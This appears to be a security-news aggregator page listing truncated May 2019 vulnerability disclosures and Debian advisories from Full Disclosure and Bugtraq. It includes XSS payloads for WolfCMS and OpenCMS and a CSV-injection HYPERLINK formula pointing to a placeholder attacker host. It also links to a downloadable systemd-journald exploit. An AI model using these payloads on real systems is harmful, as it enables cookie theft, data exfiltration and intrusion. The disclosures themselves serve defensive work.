Security News

TOR browser / Firefox telemetry data

Full Disclosure - 13 May, 2019 - 13:16

Posted by Bipin Gautam on May 13

POC:

tl;dr

run just Firefox browser / TOR and just nothing

and tcpdump the computing device / network

firewall BLOCK all IP/A names, gradually... that show up in tcpdump
when you are not using firefox but it connects automatically (if you
block something firefox hops to something else, 3-5+ times)

QUICK FIX:

in address bar:

about:config

search for string:

org

com

mozilla

firefox

google

...?

to start with : almost all... the url...

Re: System Down: A systemd-journald exploit

Bug Traq - 13 May, 2019 - 09:48

Posted by Qualys Security Advisory on May 13

Hi all,

Our systemd-journald exploit for CVE-2018-16865 and CVE-2018-16866 is
now available at:

https://www.qualys.com/2019/05/09/system-down/system-down.tar.gz

It is also attached to this email. A few notes about this exploit:

- It supports several targets by default (vulnerable versions of Debian,
Ubuntu, Fedora, CentOS), and it should be relatively easy to add more
targets.

- When adding a new amd64 target, use the...

SEC Consult SA-20190513-0 :: Cleartext message spoofing in supplementary Go Cryptography Libraries (@sec_consult)

Bug Traq - 13 May, 2019 - 09:44

Posted by SEC Consult Vulnerability Lab on May 13

Then the message was tampered by changing the value of the "Hash" Armor Header
from SHA-1 to SHA-512:

(content of hash_spoof.asc file):
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Message to be signed
-----BEGIN PGP SIGNATURE-----
iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N...

SEC Consult SA-20190513-0 :: Cleartext message spoofing in supplementary Go Cryptography Libraries (@sec_consult)

Full Disclosure - 13 May, 2019 - 08:27

Posted by SEC Consult Vulnerability Lab on May 13

Then the message was tampered by changing the value of the "Hash" Armor Header
from SHA-1 to SHA-512:

(content of hash_spoof.asc file):
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Message to be signed
-----BEGIN PGP SIGNATURE-----
iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N...

[SECURITY] [DSA 4442-1] ghostscript security update

Bug Traq - 13 May, 2019 - 01:53

Posted by Salvatore Bonaccorso on May 12

-------------------------------------------------------------------------
Debian Security Advisory DSA-4442-1 security () debian org
https://www.debian.org/security/ Salvatore Bonaccorso
May 12, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : ghostscript
CVE ID : CVE-2019-3839

A vulnerability...

Cross Site Scripting | WolfCMS v0.8.3.1 and before

Full Disclosure - 10 May, 2019 - 12:18

Posted by Pramod Rana on May 10

Description: WolfCMS v0.8.3.1 and before is vulnerable to cross site
scripting in User Add module for parameter Name.

Impacted URL is http://[your_webserver_ip]/wolfcms/?/admin/user/add

Payload used is "TestXSS><img src=x onmousover=alert(document.cookie)>

Further details: https://github.com/wolfcms/wolfcms/issues/683

Already requested for CVE, yet to receive it.

CSV Injection | Alkacon OpenCMS v10.5.4 and before

Full Disclosure - 10 May, 2019 - 12:18

Posted by Pramod Rana on May 10

Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New
User module for parameter First Name and Last Name

Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used is
'=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe")'

Further details are available here
https://github.com/alkacon/opencms-core/issues/636

Already requested for...

Cross Site Scripting | Alkacon OpenCMS v10.5.4 and before

Full Disclosure - 10 May, 2019 - 12:18

Posted by Pramod Rana on May 10

Description: OpenCMS v10.5.4 and before is vulnerable to cross site
scripting in New User module for parameter First Name and Last Name

Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used in PoC is "TestXSS<img+src=x+onmouseover=alert(document.domain)

Further details are available here
https://github.com/alkacon/opencms-core/issues/635

Already requested for CVE, yet to receive...

Re: dotCMS v5.1.1 HTML Injection & XSS Vulnerability

Full Disclosure - 10 May, 2019 - 12:17

Posted by John Martinelli on May 10

Read full vulnerability report @
https://secureli.com/dotcms-v5-1-1-open-redirect-vulnerability/

dotCMS v5.1.1 suffers from an Open Redirect Vulnerability, in addition
to many other vulnerabilities that I am still verifying.

The following URL is a proof-of-concept that requires a user to be
logged in. Simply log in to the demo before visiting the supplied POC.

Logging into the demo requires you to go to
https://demo.dotcms.com/dotAdmin <...

dotCMS v5.1.1 HTML Injection & XSS Vulnerability

Full Disclosure - 10 May, 2019 - 12:17

Posted by John Martinelli on May 10

Read full vulnerability report @
https://secureli.com/dotcms-v5-1-1-html-injection-xss-vulnerability/

dotCMS v5.1.1 suffers from an HTML injection and XSS vulnerability, in
addition to many other vulnerabilities that I am still verifying.

There's a screenshot available on my blog link above.

To reproduce this vulnerability, simply go to
https://dotcms.com/dotAdmin/ and log in with their demo credentials
(username: admin () dotcms com...

dotCMS v5.1.1 Vulnerabilities

Full Disclosure - 10 May, 2019 - 12:17

Posted by John Martinelli on May 10

Hello,

I identified several vulnerabilities in dotCMS v5.1.1 due to vulnerable
open source dependencies.

Full security write up:
http://secureli.com/dotcms-v5-1-1-vulnerable-open-source-dependencies/

The details:

/ROOT/html/js/scriptaculous/prototype.js

↳ prototypejs 1.5.0
prototypejs 1.5.0 has known vulnerabilities: severity: high; CVE:
CVE-2008-7220; http://www.cvedetails.com/cve/CVE-2008-7220/...

Enghouse Interactive´s CCSP 7.2.5 API XXE and SSRF vulnerability via unauthenticated GET Request

Full Disclosure - 10 May, 2019 - 12:14

Posted by David H on May 10

<!--
# Exploit Title: Enghouse Interactive´s CCSP 7.2.5 API XXE and SSRF
vulnerability via unauthenticated GET Request
# Date: 05-08-2018
# Exploit Author: David Herrero
# Vendor Homepage: https://www.enghouseinteractive.com
# Software Link:
https://www.enghouseinteractive.com/products/contact-center/contact-center-for-service/
# Version: Enghouse Interactive´s CCSP 7.2.5.102
# Tested on: Windows
# CVE : CVE-2018-8940
# Category:...

WordPress Plugin Form Maker 1.13.3 - SQL Injection

Full Disclosure - 10 May, 2019 - 12:13

Posted by Daniele Scanu on May 10

# Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection
# Date: 22-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://10web.io/plugins/
# Software Link: https://wordpress.org/plugins/form-maker/
# Version: 1.13.3
# Tested on: Wordpress 5.1

Description:
In the Form Maker plugin before 1.13.3 for WordPress, it's possible to
achieve SQL injection in the function get_labels_parameters in the file...

SEC Consult SA-20190510-0 :: Unauthenticated SQL Injection vulnerability in OpenProject

Bug Traq - 10 May, 2019 - 09:29

Posted by SEC Consult Vulnerability Lab on May 10

SEC Consult Vulnerability Lab Security Advisory < 20190510-0 >
=======================================================================
title: Unauthenticated SQL Injection vulnerability
product: OpenProject
vulnerable version: 5.0.0 - 8.3.1
fixed version: 8.3.2 & 9.0.0
CVE number: CVE-2019-11600
impact: Critical
homepage: https://www.openproject.org
found:...

[SECURITY] [DSA 4441-1] symfony security update

Bug Traq - 10 May, 2019 - 09:27

Posted by Sebastien Delafond on May 10

-------------------------------------------------------------------------
Debian Security Advisory DSA-4441-1 security () debian org
https://www.debian.org/security/ Sebastien Delafond
May 10, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : symfony
CVE ID : CVE-2018-14773 CVE-2018-19789...

[SECURITY] [DSA 4440-1] bind9 security update

Bug Traq - 10 May, 2019 - 09:24

Posted by Moritz Muehlenhoff on May 10

-------------------------------------------------------------------------
Debian Security Advisory DSA-4440-1 security () debian org
https://www.debian.org/security/ Moritz Muehlenhoff
May 09, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : bind9
CVE ID : CVE-2018-5743 CVE-2018-5745...

[SECURITY] [DSA 4439-1] postgresql-9.6 security update

Bug Traq - 10 May, 2019 - 09:20

Posted by Moritz Muehlenhoff on May 10

-------------------------------------------------------------------------
Debian Security Advisory DSA-4439-1 security () debian org
https://www.debian.org/security/ Moritz Muehlenhoff
May 09, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : postgresql-9.6
CVE ID : CVE-2019-10130

Dean...

SEC Consult SA-20190510-0 :: Unauthenticated SQL Injection vulnerability in OpenProject

Full Disclosure - 10 May, 2019 - 02:23

Posted by SEC Consult Vulnerability Lab on May 10

SEC Consult Vulnerability Lab Security Advisory < 20190510-0 >
=======================================================================
title: Unauthenticated SQL Injection vulnerability
product: OpenProject
vulnerable version: 5.0.0 - 8.3.1
fixed version: 8.3.2 & 9.0.0
CVE number: CVE-2019-11600
impact: Critical
homepage: https://www.openproject.org
found:...

Vuln: GitLab CVE-2019-11000 Unspecified Information Disclosure Vulnerability

Security Focus Vulnerabilities - 9 May, 2019 - 23:00
GitLab CVE-2019-11000 Unspecified Information Disclosure Vulnerability

Vuln: Linux Kernel 'net/bluetooth/hidp/sock.c' Local Information Disclosure Vulnerability

Security Focus Vulnerabilities - 9 May, 2019 - 23:00
Linux Kernel 'net/bluetooth/hidp/sock.c' Local Information Disclosure Vulnerability